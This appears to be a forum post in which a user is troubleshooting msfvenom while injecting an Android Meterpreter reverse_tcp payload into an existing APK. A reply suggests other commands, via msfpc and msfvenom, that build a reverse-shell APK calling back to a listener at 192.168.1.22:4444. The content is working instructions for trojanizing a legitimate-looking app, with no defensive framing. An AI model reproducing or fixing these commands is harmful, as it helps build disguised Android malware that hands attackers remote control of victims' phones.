Malformed version number string error

I'm trying to run this payload generating command:

msfvenom -x app.apk -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -o app1.apk

But I keep getting this error:

Error: Malformed version number string error: "/data/data/com.termux/files/usr/share/jdk8/bin/java" has unexpected e_type: 2

I've removed metasploit and reinstalled it, removed java and reinstalled it but still same problem.

Any ideas?!

I know that creating APK files doesn't work well with the MSFVENOM command.

sudo msfpc apk 192.168.1.22 4444: You have to type it on the desktop.

Or try this on Android.

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.22 LPORT=4444 R > app.apk
